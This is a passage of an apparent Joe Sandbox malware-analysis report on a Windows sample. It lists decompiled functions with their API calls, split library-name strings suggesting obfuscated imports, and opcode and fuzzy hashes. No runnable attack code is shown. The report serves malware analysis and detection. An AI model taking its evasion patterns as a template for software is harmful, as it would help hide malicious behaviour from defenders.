                                                                                                                                                                                                          • API String ID: 1519825774-0
                                                                                                                                                                                                          • Opcode ID: eed652405ae0e3b0f9b019688ef0d1c3f386c98a4ed8e9bb24e3dc3c589cc83f
                                                                                                                                                                                                          • Instruction ID: 09e949730f6cb33b8b8fb81988e2fce70307fea12bf055cedfcf1a6782e14d46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eed652405ae0e3b0f9b019688ef0d1c3f386c98a4ed8e9bb24e3dc3c589cc83f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC11B674700305EBDB20AFA5DD4ABAF7BA8EF14B01F00486AF946D2190DBB4E908D764
                                                                                                                                                                                                          Function 00496970 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 213COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004969AB
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004969BC
                                                                                                                                                                                                          • SetPropW.USER32(?,SYSPLUGIN,00000000), ref: 00496B17
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DeleteObject$Prop
                                                                                                                                                                                                          • String ID: SYSPLUGIN
                                                                                                                                                                                                          • API String ID: 2430622332-1574318955
                                                                                                                                                                                                          • Opcode ID: 465c74ea88c504b4bdccb5b3f9971d6c01e50ba518fed73208c003f2fd58de58
                                                                                                                                                                                                          • Instruction ID: b26c9207bf5ceac2e2a869887d4010c9d13d7af46911e142edc22cfd9248cec1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 465c74ea88c504b4bdccb5b3f9971d6c01e50ba518fed73208c003f2fd58de58
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14816B71A002199FCF00DFA9C884AAEFBB9FF49714F15412AE914B7361D779A900CBA4
                                                                                                                                                                                                          Function 0044A5A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 210COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0044A7DD
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 0044A7E4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Event$Create
                                                                                                                                                                                                          • String ID: ?p$pngquery
                                                                                                                                                                                                          • API String ID: 1287507382-4246078739
                                                                                                                                                                                                          • Opcode ID: cffd0c479571550dfbb47f1f441a4d381bb9a812244800fdcc8b6801c52f4990
                                                                                                                                                                                                          • Instruction ID: d4948d60a76845cd8bd3c6e269babd35156e8d684ca59321b74df19c2bf6ecb3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cffd0c479571550dfbb47f1f441a4d381bb9a812244800fdcc8b6801c52f4990
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E7164709002449FFB18DF78C948BDEBBB1EF41304F248A1DE056AB7C1D7B9AA808B51
                                                                                                                                                                                                          Function 0052519A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNEL32(?,?,Function_00124FBA,00000000,00000000,?), ref: 005251E3
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00482443,00000000,00000000,00482E30), ref: 005251EF
                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 005251F6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                          • String ID: 0.H
                                                                                                                                                                                                          • API String ID: 2744730728-2821389324
                                                                                                                                                                                                          • Opcode ID: 4515d18410b8c3078c1253922647ed3f9311f1af18304199c464f37167bab6df
                                                                                                                                                                                                          • Instruction ID: f19d7d81382518a890a0972b78546b3870082c3d460e0b2abdef827a3272b9dd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4515d18410b8c3078c1253922647ed3f9311f1af18304199c464f37167bab6df
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E901803650562AABDB259FA5EC09A9F3F69FFC7360F010424F81583190EA318911DBA0
                                                                                                                                                                                                          Function 0046D750 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shlw,00000000), ref: 0046D807
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: api.$dll$shlw
                                                                                                                                                                                                          • API String ID: 1029625771-921442103
                                                                                                                                                                                                          • Opcode ID: 99d09243a56b648d25b8870e10c4bc4a5cf8c0c137dac94e451515f3943836fa
                                                                                                                                                                                                          • Instruction ID: ccd23ce4d57146f724635aba9b3c628d98da250bf2227c527a8044da74737550
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99d09243a56b648d25b8870e10c4bc4a5cf8c0c137dac94e451515f3943836fa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0119AB0401B14DFE720CF56C5A835BBBF4FB04708F508A5DD49A5BA80C7BAA6488FC4
                                                                                                                                                                                                          Function 0046D3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(6C656873,00000000), ref: 0046D46D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: dll$l32.$shel
                                                                                                                                                                                                          • API String ID: 1029625771-349186106
                                                                                                                                                                                                          • Opcode ID: e9e5b3dc1a88b5e0a6a469cf70a925ac186adb20abf328a0ab55f4e0be2a613b
                                                                                                                                                                                                          • Instruction ID: cf51512de9342cc559ce4913b6eaaccded645758c33976cea47ea521c18f3c7d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9e5b3dc1a88b5e0a6a469cf70a925ac186adb20abf328a0ab55f4e0be2a613b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B111B0B0501B04DBE720DF55D56835BBBF4FB04708F408A5DD49A9BA80D7BAA6088F94
                                                                                                                                                                                                          Function 0046DE10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(686E6977,00000000), ref: 0046DE9D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: dll$ttp.$winh
                                                                                                                                                                                                          • API String ID: 1029625771-2570946373
                                                                                                                                                                                                          • Opcode ID: 316db7fe54206d0258fdf4590e298ddc4021fa858ae2886e09ae1700c93be8de
                                                                                                                                                                                                          • Instruction ID: fe930234d32c0b02f024c258355a29a5b36cd673cdb749216577abfb0fcd9e84
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 316db7fe54206d0258fdf4590e298ddc4021fa858ae2886e09ae1700c93be8de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B91180B0501B04DBE720DF55D56875BBBF4FB08708F408A5DD49A5BA80D7B9A608CFD4
                                                                                                                                                                                                          Function 0046D2C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(75746573,0082A280), ref: 0046D320
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID: .dll$papi$setu
                                                                                                                                                                                                          • API String ID: 1029625771-1874082302
                                                                                                                                                                                                          • Opcode ID: c719f8a96643a9373f2130588afd0a5592ac16caada603d623112d9f62e2a791
                                                                                                                                                                                                          • Instruction ID: 4d6839999a38c31f5f4f5afa88e561df1decc8bad4ed964ddd8057f2e4932538
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c719f8a96643a9373f2130588afd0a5592ac16caada603d623112d9f62e2a791
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E901F2B0901708DBD720DF59D51979BFFF4AB08704F10856DD446A7640D7B5AA08CBE5
                                                                                                                                                                                                          Function 004DC650 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004F3190: GetModuleHandleA.KERNEL32(kernel32,75920E50,00000002,004D80FF), ref: 004F319E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 004DC68D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                                                                                          • API String ID: 1646373207-3788156360
                                                                                                                                                                                                          • Opcode ID: 16e8d8781c7ff577dd6b7da44884a8f9b5961784615c29fe8d56186f66de62df
                                                                                                                                                                                                          • Instruction ID: fd0076a76264ab3809fc7b518cab3c9b10ceae0d7998c2032d32a449aefa1c50
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16e8d8781c7ff577dd6b7da44884a8f9b5961784615c29fe8d56186f66de62df
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20F065B07813035AEF215F254D6AB2726945BA0706F56417B6A15D93C1EA7CCC08D619
                                                                                                                                                                                                          Function 0046F5AC Relevance: 6.3, APIs: 4, Instructions: 266threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0046F5CB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2882836952-0
                                                                                                                                                                                                          • Opcode ID: 318ad400297d6de76f8597c7c7a0a7a7e36ed837cc79c9cc4dda782083ae38f8
                                                                                                                                                                                                          • Instruction ID: a849d3d81e9d94c1778f0b5d4ff7ad30b7be293d34ddad40e3edbb662e818b4f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318ad400297d6de76f8597c7c7a0a7a7e36ed837cc79c9cc4dda782083ae38f8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03A1A270E002198FDF24CF68E88479DBBB5AB55304F2481BBD485D7356E7348D8A8F4A
                                                                                                                                                                                                          Function 00485EE0 Relevance: 6.1, APIs: 4, Instructions: 121fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,00000000,00000000,?,004233AC,?,?,?,?,?,@1_360.exe), ref: 00485F08
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,00000000,?,004233AC,?,?,?), ref: 00485F37
                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,@1_360.exe), ref: 00485FC6
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,@1_360.exe), ref: 00485FF5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCloseCreateHandleRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2880068760-0
                                                                                                                                                                                                          • Opcode ID: 1c011c1be143bc307ee1ccb1c7d23781e3749e4b655c6097e0f10a991a6186bb
                                                                                                                                                                                                          • Instruction ID: 748e15a50aadf5fd7a5dd22f0c0e7dfd3a8882a346a5a592648a3421d7208f5c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c011c1be143bc307ee1ccb1c7d23781e3749e4b655c6097e0f10a991a6186bb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8941D8709002599BEB20EF64DD45BDEB3B5EF05304F1049AAE949BB181E7B45EC8CF54
                                                                                                                                                                                                          Function 004552D0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597F68), ref: 00455352
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0045536E
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 00455389
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597F68), ref: 004553E1
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: 2b5207b0a1fcf8eccc23bff4bddfb46184cc720cfd7b9a0c489b4d8f79066ff1
                                                                                                                                                                                                          • Instruction ID: 0c96869bc74de6e15750aba4d486048fc8e2629903977fe9c5d0e346cfa5ee5f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b5207b0a1fcf8eccc23bff4bddfb46184cc720cfd7b9a0c489b4d8f79066ff1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7931CFB1D187089FDB11DF5899067A9BBB0FB19B24F1042ABE811A33D1E7B15A04CB96
                                                                                                                                                                                                          Function 00408050 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: 45c9dcebcb4fcd055e08ea4f1d8aeb9a1e95a558c7fde6db34c192b3eedebc22
                                                                                                                                                                                                          • Instruction ID: f43bbb6423608e74e977b4177792906e6e3fb0285bda367131f04ad143072228
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45c9dcebcb4fcd055e08ea4f1d8aeb9a1e95a558c7fde6db34c192b3eedebc22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD31E835D08609DFDB10DF58DD0679EBBB5FB08B18F10429BE425A73C1EBB51A048B81
                                                                                                                                                                                                          Function 00408180 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
